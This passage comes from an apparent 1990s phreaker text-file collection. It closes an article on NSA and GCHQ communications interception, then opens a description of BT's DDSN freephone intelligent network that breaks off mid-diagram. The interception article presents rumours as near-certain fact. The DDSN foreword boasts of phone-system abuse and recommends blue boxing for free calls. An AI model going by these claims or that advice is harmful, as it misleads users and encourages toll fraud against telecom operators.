  781. "hotspots". GCHQ in the UK are now part of project MERCURY and use the system
  782. for similar purposes.
  783.  
  784.  
  785. Part II
  786. -------
  787.  
  788. Introduction to part II
  789. =======================
  790.  
  791. Summerising part I, we now know about covert satelites, the basess, and the
  792. general layout of microwave interception. Now I'm going to discuss the
  793. slighlty more scary stuff, the parts that affect me and you, ranging from
  794. the interception of phone traffic, to the mass intellegence gathering on the
  795. internet. Hopefully you've read all of part I so you can understand the
  796. folowing better, if you just paged<down> you suck.
  797.  
  798.  
  799. Submarine cable interception
  800.  
  801. Submarine cables are widley used in international telecommunications, and
  802. are therfore a target for anyone wishing to intercept international
  803. telecommunications traffic. Juring the 1970s, a secret submerged cable
  804. taping operation nammed "IVY BELLS" was executed by US submarines near the
  805. USSR. The mass line tap operation of USSR communication ended in 1992 when
  806. the geographic locations of the submerged line taps where sold to KGB by a
  807. former NSA employlee. To this date, the US still plant submerged line taps on
  808. various communications links, rumoured to be the Middle East, the med,
  809. eastern asia, and south america. The United States is the only naval power
  810. known to have deployed deep-sea technology for this purpose.
  811.  
  812. Where fibre Optic cables are concerned, it is impossible to simply place a
  813. radio sensitve inductive tap on them, because obviously fibre Optics don't
  814. leak radio freqency signals. However, the NSA spend alot of time and money
  815. into the research of Optical fibre tapping, and are rumoured to be
  816. successful in such research using optoelectronic "repeaters" which boost
  817. signal levels over long distances.
  818.  
  819.  
  820. Covert Interception of the Internet Protocol
  821. ============================================
  822.  
  823.  
  824. The NSA and GCHQ all operate a private network which is concidered to be just
  825. as large as the public net. This private network is known as project
  826. EMBROIDERY and is said to span the globe via a massive WAN network. It is
  827. this network which is said to serve such purposes as project ECHELON and
  828. other intellegence projects. The whole system is based on the IP protocol.
  829.  
  830. The majority of internet traffic origionates or is passed through the US,
  831. and major routers. Sinse early 1990, the COMINT project have developed
  832. systems which intercept and filter all packet, or digital data traveling via
  833. the US net backbones. The targets of such interceptions are communications
  834. between Europe, Asia, Oceania, Africa and South America.
  835.  
  836. When a packet is sent, depending on the time stamping of the origin and
  837. destination, it is likely it will pass through a major network exchange
  838. somewhere in the US. For example, routers in USwest are most idle when
  839. European packet traffic is at its peak beacuse of the time zone differences.
  840. Because of this, hig capicity network traffic will pass through the 
  841. routers which are situated in USwest, which subseqentialy the NSA have
  842. access to (for COMINT purposess), it is then that the NSA can intercept data
  843. traveling to and from European countrys.
  844.  
  845. Where COMINT and the internet are concerned, COMINT interception takes
  846. advantage of the way in which internet packets are routed, in the sense that
  847. datagrams contain the numerical routing instructions which are used by
  848. COMINT to filter irrelevant traffic. Any packet with a military or
  849. diplomatic datagram origin, is likely to be intercepted at a major US
  850. network backbone to be filtered or analyised.
  851.  
  852. alt.Usenet discussion groups are well known to be intercepted and analyised
  853. by government agencys, such usnet traffic accumulates about 15 gigs of
  854. transmitted data per day. Intellegence agencies have open access to all
  855. usenet discussion groups, and most store the information in massive data-
  856. bases. For example, in the UK, the DERA (Defense Evaluation and Research
  857. Agency) maintain a 1 terrabyte databasse which contains 90 days worth of all
  858. usnet messages. DERA also operate web-robots which scan the net for certain
  859. keywords and then mirror entire sites on this database. Subseqentialy my
  860. own site has been visited by DERA, and sinse then is visited 2 per month by,
  861. xxx.dera.gov.uk - - [18/Jul/1999:16:10:05 -0500] "GET /files/hybrid-files/x
  862.  
  863. Recently an NSA employee informed the public that certain major backbone
  864. net exchanges are being monitored for ALL data traveling through them in the
  865. US. The NSA either have direct access to them, or have mass sniffer programs
  866. running to collect as much data as possible traveling through the follwowing
  867. major internet exchanges in the US: (NSA Internet Comint access at IXP sites)
  868.  
  869. Internet site   Location                  Operator        Designation
  870. ------------------------------------------------------------------------------
  871. FIX East        College Park, Maryland    US government   Federal Information
  872.                                                           Exchange
  873. ------------------------------------------------------------------------------
  874. FIX West        Mountain View, California US government   Federal Information
  875.                                                           Exchange
  876. ------------------------------------------------------------------------------
  877. MAE East        Washington, DC            MCI             Metropolitan Area
  878.                                                           Ethernet
  879. ------------------------------------------------------------------------------
  880. New York NAP    Pennsauken, New Jersey    Sprintlink      Network Access Point
  881. ------------------------------------------------------------------------------
  882. SWAB            Washington, DC            PSInet/BellAtl  SMDS Washington
  883.                                                           Area Bypass
  884. ------------------------------------------------------------------------------
  885. Chicago NAP     Chicago, Illinois         Ameritech       Network Access Point
  886. ------------------------------------------------------------------------------
  887. SanFran NAP     SanFrancisco, California  Pacific Bell    Network Access Point
  888. ------------------------------------------------------------------------------
  889. MAE West        San Jose, California      MCI             Metropolitan Area
  890.                                                           Ethernet
  891. ------------------------------------------------------------------------------
  892. CIX             Santa Clara California    CIX             Commercial Internet
  893.                                                           Exchange
  894. ------------------------------------------------------------------------------
  895.  
  896. It is rumoured, and almost certanly true, that a leading US
  897. telecommunications and internet provider company are contracted with the NSA
  898. to develop specialised mass data gathering software for installation on
  899. such internet exchanges, other software manufactures such as microsoft and
  900. netscape etc are said to aid in the production of specialised network
  901. traffic interception equipment. (see enclosed .jpg files for screenshots)
  902.  
  903.  
  904. 6. Covert Collection of High Capacity Signals
  905. =============================================
  906.  
  907.  
  908. Where very sensitive data is concerned, diplomatic agencies are usually very
  909. wise to the fact that someone out their may be interested in intercepting it.
  910. Therefore, when the more obvious interception methods/procedures are
  911. inpracticle, COMINT agencies develope special devices that can be installed
  912. on the target premisiss or base. The NSA manufactures specialised equipment
  913. for use in covert activitys, one such device is called the "ORATORY" -a
  914. computer that fits into a brief case, which is programed to behave on
  915. dictionary selection for use in sigint data interception.
  916.  
  917. a) New Satellite Networks/Systems
  918.  
  919. A popular means of communication for government employees are private
  920. dedicated mobile communications. Their are satelites orbiting very fast
  921. around the earth, each in its own orbit pattern which provide global coverage
  922. for diplomatic usage. These systems are sometimes called Satelite Personal
  923. Communications Systems or SPCS. At present, their is a satelite network
  924. called the IRIDIUM network, which was launched in 1998. The IRIDIUM satelite
  925. network implements 66 satelites each relaying mobile data back to the ground.
  926. IRIDIUM is considered to be fairly secure, in the sense that anyone trying
  927. to intercept network data would have great trouble as the satelites are fast
  928. moving and only beam information back down to earth in a concentrated beam.
  929.  
  930. b) ILC Processing Techniques
  931.  
  932. Covert agencies employ a vast array of multi-protocol data interception
  933. systems and devices. Such devices are capable of intercepting selectable,
  934. or randomly chosen communications channels implementing a new concept called
  935. "topic analysis". It has been a rumour for a long time that covert agencies
  936. use equipment that is capable of reacting to certain keywords when
  937. intercepting voice or modem traffic. It is rumoured that if you say somthing
  938. like "kill_the_presedent" over the telephone, you'll have a gathering of
  939. feds outside your front door. This rumour however, is probably not true when
  940. refering to a residential line, unless a line has been "tapped" beforehand.
  941. However, such systems DO exist, and all operate on topic analysis techniques.
  942. For example: Such systems are based on dictionary computers with built in
  943. (pre-programmed) key words. These systems are designed to be placed in the
  944. paths of communications channels, such as standard voice traffic, or modem
  945. links. The properties of such systems are as follows:
  946.  
  947.         o  A topic analysis COMINT system would be "attracted" to certain
  948.            levels of communications traffic, such as international calls to
  949.            and from "hotspot" areas, above normal calling freqency (scanning,
  950.            or suspicious overusage of a given communications protocol).
  951.  
  952.         o  ability to "pick-up" on certain keywords, or signitures.
  953.  
  954.         o  voicetracking capabilitys, ie: voice recognition, freqency
  955.            analysis of voice patterns.
  956.  
  957. It is therefore presumarable that such monitornig devices may be attracted to
  958. any given voice/data channel if such patterns are emited, ie: heavy call
  959. usage. However, such interception techniques can be impaired to a certain
  960. extent, when the channels being monitored implement voice or data encryption,
  961. hense the international export laws on cryptographic engines and alghorithms.
  962. Comint interception devices are individualy designed to intercept differnt
  963. arrays of communications protocols, for example, some devices are designed
  964. soly to intercept internet traffic (packet analysis, headers etc) others are
  965. designed to intercept pager signals, and voice traffic (topic analysis). Any
  966. type of publically known communications medium is subject to interception by
  967. a foreign source (if their is motive).
  968.  
  969.  
  970. 7. Hardcore Telecommunications Covert Interception 
  971. ==================================================
  972.  
  973.  
  974. a) Broadband (High Capacity Multi-Channel) Communications
  975.  
  976.  
  977. taken from a 9x file by me (FDM):
  978. http://www.ninex.com/9x/rawtext/9X_TEL.TXT
  979. ------------------------------------------------------------------------begin-
  980. To maximise the frequency spectrum available over trunk cables and
  981. international links, the subscribers base band voice signals covering from
  982. 300 to 3400 Hz are translated usinga sideband (SSB) modulation to a higher
  983. frequency range suitable for propagation over coaxial cables and radio links.
  984. 12 basic channels are modulated on to carriers in the range 64 to 108 KHz
  985. and speed 4 kHz apart. When the lower sideband (LSB) is selected, these  form
  986. a 'group' with a bandwidth of 48 kHz, extending from 60 to 108 kHz. Five
  987. groups are then modulated in a similar manner onto carriers spaced at 48 kHz
  988. intervals from 420 to 612 kHz to form a 'supergroup'.
  989.  
  990. 16 supergroups are then LSB-SSB modulated onto carriers spaced by 248 kHz
  991. from 1116 kHz upwards. This results in band of freqencies from 564 kHz
  992. upwards.
  993.  
  994. To utilise the range bellow 564 kHz, a supergroup is modulated on to a 612
  995. kHz carrier which after selection of LSB is reduced to a band between 60 and
  996. 300 kHz. The band between 300 and 564 kHz is filled with another supergroup
  997. in basic form (312 to 552 kHz).
  998.  
  999. This hierarchy, referred to as 'master' or 'hypergroup', provides a muliplex
  1000. (including freqency gaps or guardbands to cater for the characteristics of
  1001. practical filters), with an upper frequncy of close to 4 MHz which is easyily
  1002. carried over a coax cable. 
  1003. --------------------------------------------------------------------------end-
  1004.  
  1005. Analouge communications are now more or less obsoleet as literaly all
  1006. international telecommunications protocols and developments turn digital.
  1007. Digital telecoms are based on a method called TDM (Time Division
  1008. Multiplexing), this alows multi-channel communications to take place. The
  1009. individual conversational channels are first digitised. Information
  1010. concerning each channel is then transmitted sequentially rather than
  1011. similtaneously, with each link occupying successive time slots. Bell
  1012. implement t1 links as part of the majour routng backbones on the US PSTN
  1013. which handle 24 phone channels at 1.544 Mbps.
  1014.  
  1015. European countrys, such as the UK, operate on slightly higher transmission
  1016. speeds as part of the backbone. Instead of T-1 technology, European telco
  1017. providers have implemented a different protocol called E-1, which carrys
  1018. 30 phone channels at 2 Mbps. Most COMINT telecommunications interception
  1019. equipment is designed to intercept the European transmission protocols.
  1020.  
  1021. New digital telephony techniques are emerging all the time, so Comint
  1022. agencies spend alot of time and money investigating each new transmission
  1023. technique. One of the latest developments, is the implementation of the
  1024. SONET network, which uses synchronised signals which are carried by high
  1025. capacity optical fibres, and are supposidly easily extractable by Comint
  1026. agencies when high capacity links are involved.
  1027.  
  1028. b) Covert Telecommunications Interception Equipment
  1029.  
  1030. The NSA contract many organisations to devlop and produce Comint and Sigint
  1031. sophisticated interception equipment. Such entitys include Space Systems,
  1032. Lockheed, TRW, Raytheon and Bendix. The two majour contracted NSA developers
  1033. include AST (Applied Signal Technology) and IDEAS corp, where the directors
  1034. are ex NSA employees. Out of all these NSA contracted developers, AST seems
  1035. to be the most conspicuous, and describes its equipment as "TEMPEST screened"
  1036. Such an organisation was described as "the one stop ECHELON shop".
  1037.  
  1038.  
  1039. Extraction of Wideband Signals and Data Analysis
  1040. ================================================
  1041.  
  1042.  
  1043. Where wideband/broadband siganl interception is concerned, they are usually
  1044. intercepted from satelite relays and tapped digital multiplexed cables.
  1045. One such method used by COMINT agencies is called "wideband extraction",
  1046. and involves utilising specialsed Sigint equipment manufactured by the NSA
  1047. contracted companies. Interception applications available to COMINT agencies
  1048. is as followed: (transponder survey equipment)
  1049.  
  1050.         o  satellite downlink inception
  1051.         o  demodulators
  1052.         o  decoders
  1053.         o  demultiplexers
  1054.         o  microwave radio link analysers
  1055.         o  link survey units
  1056.         o  carrier analysis systems
  1057.  
  1058. Satelite data link interception is analysised with AST equipment (AST model
  1059. 196 transponder charactorisation system) where the basic structure of the
  1060. siganl is broken down and analyised. The AST model 195 "the SNAPPER" is a
  1061. wideband snapshot analyiser and capture data from extensivly high capicity
  1062. systems for extraction. A newly developed system is the AST model 990,
  1063. "Flexible Data Acquisition Unit", which is designed to record and analyise
  1064. data from 2.488 Gbps SONET OC-48 telecommunications backbones, this device is
  1065. fitted with 48 Gigs of memory and is capable of intercepting every packet
  1066. of data from multiple internet exchanges. The data that is intercepted is
  1067. then stored on RAID HD networks and then later analyised by an AST SONET
  1068. 257E analyiser.
  1069.  
  1070. Their are many steps and procedures that Comint agencies follow when
  1071. intercepting such data. First, obviously the data is intercepted at links,
  1072. channels and exchanges, then the captured data is broken down into parts so
  1073. that multi channel processors can extract then filter the contained messages
  1074. such as voice channels, fax communication, and modem data.
  1075.  
  1076. " The AST Model 120 multi-channel processor - used by NSA in different
  1077. configurations known as STARQUAKE, COBRA and COPPERHEAD - can handle 1,000
  1078. simultaneous voice channels and automatically extract fax, data and voice
  1079. traffic. Model 128, larger still, can process 16 European E-3 channels (a
  1080. data rate of 500 Mbps) and extract 480 channels of interest. The 1999 giant
  1081. of AST's range, the Model 132 "Voice Channel Demultiplexer", can scan up to
  1082. 56,700 communications channels, extracting more than 3,000 voice channels of
  1083. interest. AST also provides Sigint equipment to intercept low capacity
  1084. VSAT satellite services used by smaller businesses and domestic users.
  1085. These systems can be intercepted by the AST Model 285 SCPS processor, which
  1086. identifies and extracts up to 48 channels of interest, distinguished between
  1087. voice, fax and data. "
  1088.  
  1089.  
  1090. Covert Data Processing, Fax Transmission Analysis
  1091. =================================================
  1092.  
  1093.  
  1094. After the actual transmission interception has taken place, the extracted
  1095. data is then analyised by sophistaicated AST developed software with "user
  1096. friendly" equipment. AST have developed specialised covert operations data
  1097. filtering and extraction software called ELVIRA which opertates on given
  1098. specifications such as STRUM. THe software analysises the data and informs
  1099. the user of phone call destinations and other signal related information.
  1100. The information is then sent back to a remote NSA location in the form of
  1101. CSDF (Collected Signals Data Format).
  1102.  
  1103. Included in this file is a screenshot of a special software platform designed
  1104. by AST called TRAILMAPPER which can operate upto speeds of 2.5 Gbps, and is
  1105. designed to be very versatile, in the sense that it can intercept any type
  1106. of telecommunications medium (especialy optitical protocols). The trailmapper
  1107. software is especialy suited to extracting and analysising data from the new
  1108. ATM (Asychronous Transfer Mode) networks which are becoming increasing
  1109. popular from implementation from IXCs such as AT&T. AT&T operate a special
  1110. ATM network which spans the US, aswell as another ATM network which is
  1111. backboned via European locations. COMINT agencies are esspecialy interested
  1112. in ATM networks because telco providers offer ATM networking for VPNs, LANS
  1113. and international WANS.
  1114.  
  1115. AST also offer very specialised equipment and software which is designed to
  1116. intercept data from devices used to connect to networks and the internet.
  1117. When a telecommunications link is intercepted, a transmission from an
  1118. individual using a modem to connect to a network or the internet is easily
  1119. extracted and then later anlayised. Aswell as modem interception, FAX
  1120. transmissions are also of intellegence interest. A fax transmission can be
  1121. intercepted at any point juring its journy over a PSTN, and then later
  1122. analysied (or analyised in real time) by AST software such as the Fax Image
  1123. Workstation which implements OCR (Optical Charcter Recognition). And if you
  1124. think that's scary.. AST also produce a system called "Pager Identification
  1125. and Message Extraction" system which automatically collects and processes
  1126. data from commercial paging systems. The NSA contracted collective "IDEAS"
  1127. also produce specialised covert equipment like the VTP (Video
  1128. Teleconferencing Processor) which has the ability to intercept and record
  1129. multiple similtanious video, and/or teleconference calls.
  1130.  
  1131.  
  1132. Multi Protocol Traffic Analysis Techniqes
  1133. =========================================
  1134.  
  1135.  
  1136. Covert agencies participate in the art of traffic analysis, where information
  1137. from telephone calls is processed and then later studied, depending on the
  1138. area of "interest". For example, in such activities, information about the
  1139. subjects line is always tranmitted when placing a call, such as the CLID and
  1140. the origin of the call via SS7 protocols. Even if voice encryption is used,
  1141. the intercepted voice channel still reveals important, and potentialy
  1142. sensitive data about the call type:
  1143.  
  1144.         o  CLID
  1145.         o  duration of call
  1146.         o  OPC codes
  1147.         o  destination of call
  1148.         o  freqency of call setups
  1149.  
  1150. Text locators: Applications have been built that are designed to intercept
  1151. and sift through large arrays and quantitys of data and information. Such
  1152. applications are essential to the effective operation of systems such as
  1153. ECHELON, as the ECHELON system uses dictionary based applications to filter
  1154. important or un-inportant data. Such systems can be ported to act as robots
  1155. on most communication protocols, such as IP or voice traffic. Data that has
  1156. been intercepted is stored on massive databases for later retreavel, so a
  1157. covert agency could implement topic analysis technology to search an
  1158. internal database for keywords, ie: "counter attack" or "kill the president".
  1159. The NSA currently use a filtering method known as "N-gram" which is designed
  1160. to sort through a textual database for any topic, regardless of language.
  1161.  
  1162. "To use N-gram analysis, the operator ignores keywords and defines the
  1163. enquiry by providing the system with selected written documents concerning
  1164. the topic of interest. The system determines what the topic is from the seed
  1165. group of documents, and then calculates the probability that other documents
  1166. cover the same topic. In 1994, NSA made its N-gram system available for
  1167. commercial exploitation. NSA's research group claimed that it could be used
  1168. on "very large data sets (millions of documents)", could be quickly
  1169. implemented on any computer system and that it could operate effectively "in
  1170. text containing a great many errors (typically 10-15% of all characters)".
  1171.  
  1172. The "Data Workstation" Comint software system analyses up to 10,000 recorded
  1173. messages, identifying Internet traffic, e-mail messages and attachments
  1174.  
  1175.  
  1176. Speech Recognition and Voice Interception
  1177. =========================================
  1178.  
  1179.  
  1180. The UK's GCHQ combined with the US's NSA all conduct research into speech
  1181. recognition techniques. Rumours that such technology is used to "pick up" on
  1182. certain keywords in telephone speech cannot be classified as concrete fact,
  1183. because obviously such organisations would deny this type of communications
  1184. monitoring. However, if such a system is deployed by these agencies, they
  1185. would be able to gather a higher degree of intellegence information, rather
  1186. than picking on areas of suspition. If software is available to the public
  1187. that allows a pc user to talk to a computer, then have the computer dictate
  1188. what the person is saying into text format, just imagine what the COMINT
  1189. agencies have..
  1190.  
  1191.  
  1192. Advanced Speech Recognition, Real CallerID
  1193. ==========================================
  1194.  
  1195.  
  1196. GCHQ and the NSA currently have TE464375-1 VADA (Voice Activity Detector and
  1197. Analyser) equipment installed inside a GCHQ base in Cheltenham England.
  1198. Advanced specch recognition systems can be produced to operate on a mass
  1199. scale basis, whereas a subjects voice patterns can be programmed into such
  1200. a device, which will then hunt that particular voice patter down on a given
  1201. set of telephone channels. System descriptions must be classified "secret" if
  1202. NSA "determines that they represent major advances over techniques known in
  1203. the research community".
  1204.  
  1205.  
  1206. 8. Closing, Summerisation 
  1207.  
  1208. This article only covers a very limited set of covert communications
  1209. interception techniques, their are many more out their. The COMINT and
  1210. SIGINT organisations are very resourcfull, in the sense that they have vast
  1211. funds to back up research into covert communications devices. The idea that
  1212. technology exists that can distinguish voice patterns over telephone channels
  1213. it particulary scary, and in a sense, a complete infringment of the "private"
  1214. service that the telco providers offer. The fact is, such technologys do
  1215. exist, and can (or have) been implemented. Telecommunications equipment is
  1216. intended for the interception of "hotspot" information such as military and
  1217. diplomatic communications, it is however strange that such systems are
  1218. designed to be attached to majour telecommunications backbones (Opticaly
  1219. Derived) to "filter" the imporatant information. Its a case of whether or
  1220. not you "trust" the NSA or GCHQ or whatever to only intercept real
  1221. intellegence information, or whether they'll adopt the "big brother" approach
  1222. and monitor ALL communications. Either way, they are unlikely to admit to
  1223. any such activitys, the fact is, they have the technology and the ability to
  1224. monitor all majour communications protocols.. Do you trust them? Do they
  1225. trust you? Its all in the name of "National Security"...
  1226.  
  1227. Well, thats it for this file, I hope you enjoyed it. Werd/Shouts to:
  1228.  
  1229. D4RKCYDE, 9x, b4b0, kelticphr0st, jasun, zomba, bodie, gr1p, shadowx, lowtek,
  1230. psyclone, shylock, digiphreq, downtime, elaich, oxidation, substance, tip,
  1231. pbxphreak, lusta & nou, force, microwire, oclet, knight, siezer, devious.
  1232.  
  1233. ------------------------------------------------------------------------------
  1234.  
  1235.  
  1236.                               B L 4 C K M 1 L K
  1237.                                  teleph0nics
  1238.  
  1239.                             FUCKIN HARDCORE, BABY
  1240.  
  1241.                            http://hybrid.dtmf.org/
  1242.  
  1243.  
  1244. ------------------------------------------------------------------------------
  1245.  
  1246.  
  1247. Type Bits/KeyID    Date       User ID
  1248. pub  2048/86298E99 1999/09/18 hybrid <hybrid@dtmf.org>
  1249.  
  1250. -----BEGIN PGP PUBLIC KEY BLOCK-----
  1251. Version: 2.6.3ia
  1252.  
  1253. mQENAzfjBzcAAAEIANaRNlbj/1FQo3V6JK4L+lziSwsXh/axd7trkB9lP2Sxwv/U
  1254. F7/avmxY3PhjjpqG3o85z2D1qduVSZcXoN6iF/JiCMqAU2nsfmZwvO9U7WZX5Xv/
  1255. wEUuqDAt59YKLqSjpZXue/ROZJLSAJXbhbOEZdq24gzDMAvCmqJJWk/7QdFoJYl1
  1256. 0aszUPTyw6JA0ys+K9YRyiYAPe4RvJV0VaImP5uNaf8w+H1znTL8dUmUYqSbbRx2
  1257. 0p5AJTxPTYsNWRg9LopF2qVIOf8SGpvJTCfsLoZxfmezUBWv5nrSU6H9xlFGdlJK
  1258. RezXi8QYGEyljAZODt930r9iS9XxckKelIYpjpkABRG0GGh5YnJpZCA8aHlicmlk
  1259. QGR0bWYub3JnPokBFQMFEDfjBzhyQp6UhimOmQEBC70H/R+rZfFef3PzGO0ez9ct
  1260. dNq7lTUkuStXmqpJhHNSuNEAx9b5q2DjKS/LJQYn+WymfA0mSeGaYL8yJ7wroh1N
  1261. JHySe266qEjov6R/WjUk1f/OEz38UCfzln7MtLykhk9bnWC745uwTiXAdU6hUzUN
  1262. J45opUpWwAQ843MWypN3Mm4q7UnBMAlcUXyyWEWpZrc9lxSaZDyw9acEZLKqDgwB
  1263. m6fMiyq4QXeoVI4HbLHiZFDll7+XE5HripXyKXU0qhACcr7JbM5jYWrmob9XL94r
  1264. 3HAiOfJQbQIC25D3Cbf++ilwLsTdVR6bCFsiw3YPEK9/v0WTZHAIr8ftXl2C2OjG
  1265. Q0s=
  1266. =8jkO
  1267. -----END PGP PUBLIC KEY BLOCK-----
  1268.  
  1269. .
  1270. :
  1271. |
  1272. +-+[ DDSN intellegent network ]+---> by kelticphrost <-----------------------+
  1273. +-+[ D4RKCYDE                 ]+--->                 <-----------------------+
  1274.                                                                              |
  1275.                                                                              :
  1276.                                                                              .
  1277.  
  1278.          _\|/_    [ GBH ]     Ghwan Burnin Haxorz     [ GBH ]   _\|/_
  1279.  
  1280.  ///////////////////////////////////////////////////////////////////////////
  1281.  //                                                                       //
  1282.  //                         DDSN Intelligent Network                      //
  1283.  //                                                                       //
  1284.  //    A full rundown of our LinkLine (0800) and LoCall (0345) Services   //
  1285.  //                                                                       //
  1286.  //                    Presented in full By Keltic Phr0st                 //
  1287.  //                                                                       //
  1288.  ///////////////////////////////////////////////////////////////////////////
  1289.  
  1290.     "...the most sophisticated network of its type ouside North America."
  1291.  
  1292.                                  Steve Webster, BT ; DDSN Development Team
  1293.  
  1294.  FOREWORD
  1295.  ========
  1296.  This article shook me up very badly after reading it. At the time I'd been
  1297.  working extensively on a Unix Box in 896, and abusing the fuck out of P******
  1298.  for global calls in 892. Not only this, but a host of other activities, which
  1299.  are probably nestling on some AMA tape somewhere, waiting to be looked at...
  1300.  <Gulp> . Its not all doom and gloom though - AMA has yet to pinpoint Blue
  1301.  Boxing for some reason, and in so far this would seem to be the only real
  1302.  'safe' method of putting your calls away for free alongside cellular, I
  1303.  reccomend you start to view it in a new light.
  1304.  
  1305.         Anyway, after that suitably apocalyptic snippet, here we go.
  1306.  
  1307.  /////  /////   /////   /////   /////   /////  /////   /////   /////   /////
  1308.  
  1309.  INTRODUCTION
  1310.  ============
  1311.  In 1983, British Telecom identified a major market potential for automatic
  1312.  freephone and premium rate services. An Analogue Network, with extended
  1313.  register translation and call charging facilities overlayed on the PSTN
  1314.  was proposed as an interim solution. The analogue derived services network,
  1315.  consisting of eight fully-interconnected switching nodes, was brought into
  1316.  limited public service in April 1985 and full public service in July 1985.
  1317.  
  1318.         The LinkLine 0800 service permits calling customers to make calls
  1319.  free of charge while callers to LinkLine 0345 service numbers are charged
  1320.  at the local call rate irrespective of distance. The balance of the call
  1321.  charge is billed to the called customer known as the Service Provider (SP).
  1322.  
  1323.         In keeping with its buisness modernisation programmes, British Telecom
  1324.  awarded a contract to AT&T for the supply and installation of a digital
  1325.  derived services network (DDSN), comprising 5ESS-PRX digital switches to
  1326.  be implemented in two distinct phases:
  1327.  
  1328.   Phase 1, which was completed in 1988, involved the supply of eight digital
  1329.   units, utilising CCITT No. 7 common-channel signalling, as replacements for
  1330.   their analogue units (Figure 1). In addition, two new digital units were
  1331.   provided in London.
  1332.  
  1333.  
  1334. Figure 1 : Digital Derived Services Network Interconnection
  1335.  
  1336.     ┌─────┐                                                       ┌─────┐
  1337.     │ DLE │                                                       │ DLE │
  1338.     └──┬──┘                                                       └──┬──┘
  1339.        │      ╔═══════════════════════════════════════════════╗      │
  1340.     ┌──┴───┐  ║    SP         DIGITAL DERIVED          SP     ║  ┌───┴──┐
  1341.     │ DMSU │  ║     ┬        SERVICES NETWORK           ┬     ║  │ DMSU │
  1342.     └──┬───┘  ║     │                                   │     ║  └───┬──┘
  1343.        │      ║     │                                   │     ║      │
  1344.        │      ║     │                                   │     ║      │
  1345.        │      ║ ┌───┴───┐                           ┌───┴───┐ ║      │
  1346.        └────────┤ DDSSC ├───────────────────────────┤ DDSSC ├────────┘
  1347.               ║ └───┬──┬┘                           └┬──┬───┘ ║
  1348.               ║     │  │                         ┌───┘  │     ║
  1349.               ║     │  └─────────────────────────│───┐  │     ║
  1350.               ║     │                            │   │  │     ║
  1351.               ║     │  ┌─────────────────────────┘   │  │     ║
  1352.               ║ ┌───┴──┴┐                           ┌┴──┴───┐ ║
  1353.        ┌────────┤ DDSSC ├───────────────────────────┤ DDSSC ├────────┐
  1354.        │      ║ └───┬───┘                           └───┬───┘ ║      │
  1355.        │      ║     │       (Only 4 centres             │     ║      │
  1356.        │      ║     │        shown for clarity)         │     ║      │
  1357.     ┌──┴───┐  ║     │                                   │     ║  ┌───┴──┐
  1358.     │ AMSU │  ║     ┴                                   ┴     ║  │ AMSU │
  1359.     └──┬───┘  ║    SP                                  SP     ║  └───┬──┘
  1360.        │      ║                                               ║      │
  1361.        │      ╚═══════════════════════════════════════════════╝      │
  1362.     ┌──┴──┐                                                       ┌──┴──┐
  1363.     │ ALE │                                                       │ ALE │
  1364.     └─────┘               EXISTING PUBLIC SWICHED                 └─────┘
  1365.                              TELEPHONE NETWORK
  1366.  
  1367.  
  1368.  
  1369.  AMSU    Analogue Main Switching Unit
  1370.  ALE     Analogue Local Exchange
  1371.  DDSSC   Digital Derived Services Switching Centre
  1372.  DLE     Digital Local Exchange
  1373.  DMSU    Digital Main Switching Unit
  1374.  SP      Service Provider
  1375.  
  1376.  
  1377.  
  1378.   Phase 2 makes provision for an advanced freephone service using an
  1379.   intelligent network architecture.
  1380.  
  1381.  INTELLIGENT NETWORK CONCEPT
  1382.  ===========================
  1383.       In a traditional telecommunications network, call control 'intelligence'
  1384.  resides in the call processing software in its switching nodes. One disadvan-
  1385.  tage of this approach for some services is that customer-specific data has to
  1386.  be replicated in each node. As features become more sophisticated, then
  1387.  system complexity increases. In the DDSN Intelligent Network, specialised
  1388.  customer feature and routing information is held centrally in a network
  1389.  database which can be accessed by all switching nodes using dedicated
  1390.  datalinks and common-channel signalling (Figure 2). These signalling datalinks
  1391.  are used to pass requests for call handling information to the database and
  1392.  return instructions to the originating switching node.
  1393.  
  1394. Figure 2 : Network DataBase Concept
  1395.  
  1396.                            ┌──────────┐
  1397.                            │ NETWORK  │
  1398.                           /│ DATABASE │\
  1399.                         /  └──────────┘  \
  1400.                  ACCESS TO/FROM ALL DDSN SWITCHES
  1401.                     /            |           \
  1402.                   /              |             \
  1403.        ┌────────┐                |               \ ┌────────┐
  1404.        │  DDSN  ├──────────────────────────────────┤  DDSN  │
  1405.        │ SWITCH │                                  │ SWITCH │
  1406.        └───┬──┬─┘                                  └┬──┬────┘
  1407.            │  └─────────────────┐┌──────────────────┘  │
  1408.            │                   ┌│┘                     │
  1409.            │                   ││                      │
  1410.            │  ┌────────────────┘└───────────────────┐  │
  1411.        ┌───┴──┴─┐               ┌─┐                ┌┴──┴────┐
  1412.        │  DDSN  ├─────────────────│────────────────┤  DDSN  │
  1413.        │ SWITCH │               │ │                │ SWITCH │
  1414.        └────────┘               └┬┘                └────────┘
  1415.                                  │
  1416.                                  │
  1417.                         SPEECH AND SIGNALLING
  1418.  
  1419.  
  1420.         An Intelligent network centralised call management fucntion allows
  1421.  an economical implementation of advanced features, simplifies administration
  1422.  of complex services and assures optimum use of network-wide, rather than
  1423.  switch-based, resources.
  1424.  
  1425.  DDSN INTELLIGENT NETWORK ARCHITECTURE
  1426.  =====================================
  1427.         Three network elements are concerned with call processing for service
  1428.  providers with advanced features:
  1429.  
  1430.         o Action Control Point (ACP)
  1431.         o Network Control Point (NCP)
  1432.         o Network Services Complex (NSC)
  1433.  
  1434.  The network architecture is illustrated in Figure 3, and the role of each
  1435.  of the elements will become apparent as the call processing aspects are
  1436.  explained.
  1437.  
  1438. Figure 3 : DDSN Intelligent Network Architecture
  1439.  
  1440.          ┌─────┐    ┌─────┐                        ┌─────┐
  1441.          │ NSC │    │ NSC │                        │ NSC │
  1442.          └─┬─┬─┘    └──┬──┘                        └──┬──┘
  1443.            C T         │                              │
  1444.            7 T         ├──────────────┐  ┌────────────┤
  1445.            N T         │      C7NA    │  │  C7NA      │
  1446.            A │         │┌─────────────│──┘            │
  1447.            │ │         ││             └──────────────┐│
  1448.           ┌┴─┴─────────┴┴─┐                        ┌─┴┴────────────┐
  1449. ──T──T──T─┤               ├─────────C7NA───────────┤               ├─T───T───T──
  1450.           │ ACP/STEP/HOST ├───T───────T────────T───┤   ACP / STEP  │
  1451. ───C7BT───┤               ├─────────C7BT───────────┤               ├───C7BT─────
  1452.   (PSTN)  └┬─┬─┬───────┬┬┬┘                        └┬┬┬───────┬─┬─┬┘  (PSTN)
  1453.            C V C       ││└──────────C7BT──────────────┐       C V C
  1454.            │ O │       │└───────VOICE TRUNKS─────────┐│       │ O │
  1455.            7 I 7       └────────────C7NA────────────┐││       7 I 7
